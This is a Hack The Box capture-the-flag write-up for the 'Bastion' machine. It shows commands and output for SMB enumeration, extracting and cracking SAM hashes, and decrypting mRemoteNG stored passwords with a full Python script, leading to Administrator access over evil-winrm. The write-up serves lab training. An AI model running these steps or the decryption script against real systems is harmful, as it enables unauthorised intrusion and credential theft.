Rustscan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\\x00
| Workgroup: WORKGROUP\\x00
|_ System time: 2025-02-04T02:08:35+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-04T01:08:34
|_ start_date: 2025-02-04T00:37:11
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26941/tcp): CLEAN (Couldn't connect)
| Check 2 (port 38727/tcp): CLEAN (Couldn't connect)
| Check 3 (port 18741/udp): CLEAN (Timeout)
| Check 4 (port 26560/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -19m53s, deviation: 34m35s, median: 3s
SMB Share
(jimmy㉿kali)-[/mnt/smb_share]
└─$ smbclient -L \\\\\\\\bastion.htb\\\\
Password for [WORKGROUP\\jimmy]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to bastion.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ smbclient \\\\\\\\bastion.htb\\\\Backups -U " "
Password for [WORKGROUP\\ ]:
Try "help" to get a list of possible commands.
smb: \\> ls
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1172156 blocks available
smb: \\>
(jimmy㉿kali)-[/mnt/smb_share]
└─$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow
Mount Share
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ mount -t cifs //bastion.htb/backups /mnt/smb_share
mount.cifs: permission denied: no match for /mnt/smb_share found in /etc/fstab
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ sudo mount -t cifs //bastion.htb/backups /mnt/smb_share
Password for root@//bastion.htb/backups:
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ cd /mnt/smb_share
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ ls
note.txt SDT65CB.tmp WindowsImageBackup
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ ll
total 1
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
drwxr-xr-x 2 root root 0 Feb 22 2019 WindowsImageBackup
Enumerate Windows Image Backup
- Found VHD files in WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
- VHD file 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is system image. Able to get SAM and SYSTEM hive.
- Used 7z to extract files
(jimmy㉿kali)-[/mnt/smb_share/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─$ 7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd Windows/System32/config/SAM -o/home/jimmy/HTB/rooms/bastion
(jimmy㉿kali)-[/mnt/smb_share/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─$ 7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd Windows/System32/config/SYSTEM -o/home/jimmy/HTB/rooms/bastion
Used samdump2
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Hastcat
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
Server has OpenSSH installed used it to SSH with L4mpje user
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\\Users\\L4mpje>whoami
bastion\\l4mpje
l4mpje@BASTION C:\\Users\\L4mpje>
User Flag
l4mpje@BASTION C:\\Users\\L4mpje\\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\\Users\\L4mpje\\Desktop
22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
04-02-2025 01:37 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.800.647.168 bytes free
l4mpje@BASTION C:\\Users\\L4mpje\\Desktop>type user.txt
18e2668bbcfd5db7c1e7c383a50efb47
A remote tool called mRemoteNG was installed on the server
- I started to dig around and found a config file for mRemoteNG containing user and passwords
- Passwords were base64 encoded. When decoding I was given a hex code.
- I did some research and found a python script that will decode the conCons.xml file and decrypt the hex code.
- I copied the confCons.xml file into the Backups share and then moved it to my local.
l4mpje@BASTION C:\\Users\\L4mpje>cd AppData\\Roaming\\mRemoteNG
l4mpje@BASTION C:\\Users\\L4mpje\\AppData\\Roaming\\mRemoteNG>dir Volume Serial Number is 1B7D-E692
D 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.824.895.488 bytes free
l4mpje@BASTION C:\\Users\\L4mpje\\AppData\\Roaming\\mRemoteNG>copy confCons.xml C:\\Backups 1 file(s) copied.
Python script
#!/usr/bin/env python3
import base64
import hashlib
import re
import sys
from Cryptodome.Cipher import AES
if len(sys.argv) != 2:
print(f"[-] Usage: {sys.argv[0]} [confCons.xml]")
sys.exit(1)
# Read the configuration file
try:
with open(sys.argv[1], 'r', encoding="utf-8") as f:
conf = f.read()
except FileNotFoundError:
print(f"[-] Unable to open {sys.argv[1]}")
sys.exit(1)
# Extract BlockCipherMode
mode_match = re.findall(r'BlockCipherMode="(\\w+)"', conf)
if not mode_match:
print("[-] Warning - No BlockCipherMode detected")
elif mode_match[0] != 'GCM':
print(f"[-] Warning - This script is for AES GCM Mode. {mode_match[0]} detected")
# Extract nodes
nodes = re.findall(r'<Node .+?/>', conf)
if nodes:
print(f"[+] Found nodes: {len(nodes)}\\n")
else:
print("[-] Found no nodes")
sys.exit(1)
# Process each node
for node in nodes:
try:
user_match = re.search(r' Username="([^"]*)"', node)
user = user_match.group(1) if user_match else "(No Username)"
password_match = re.search(r' Password="([^"]+)"', node)
if not password_match:
print(f"[-] No Password found for user: {user}")
continue
enc = base64.b64decode(password_match.group(1))
# Ensure encrypted data is valid (minimum 48 bytes: salt(16) + nonce(16) + tag(16))
if len(enc) < 48:
print(f"[-] Skipping invalid encrypted data for user: {user}")
continue
salt, nonce, cipher, tag = enc[:16], enc[16:32], enc[32:-16], enc[-16:]
key = hashlib.pbkdf2_hmac("sha1", b"mR3m", salt, 1000, dklen=32)
aes = AES.new(key, AES.MODE_GCM, nonce=nonce)
aes.update(salt)
# Proper decryption with authentication
password = aes.decrypt_and_verify(cipher, tag).decode()
print(f"Username: {user}\\nPassword: {password}\\n")
except (ValueError, IndexError, base64.binascii.Error) as e:
print(f"[-] Error processing node for user {user}: {str(e)}")
except Exception as e:
print(f"[-] Unexpected error for user {user}: {str(e)}")
Decrypted hash
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ python3 mremoteng_decode.py confCons.xml
[+] Found nodes: 2
Username: Administrator
Password: thXLHM96BeKL0ER2
Username: L4mpje
Password: bureaulampje
Used evil-winRM to remote
(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ evil-winrm -i 10.10.10.134 -u 'administrator' -p 'thXLHM96BeKL0ER2'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ..
*Evil-WinRM* PS C:\\Users\\Administrator> cd Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> dir
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2025 3:11 AM 34 root.txt
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> type root.txt
2202715d3cb6acc1ddae742e20859c33
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop>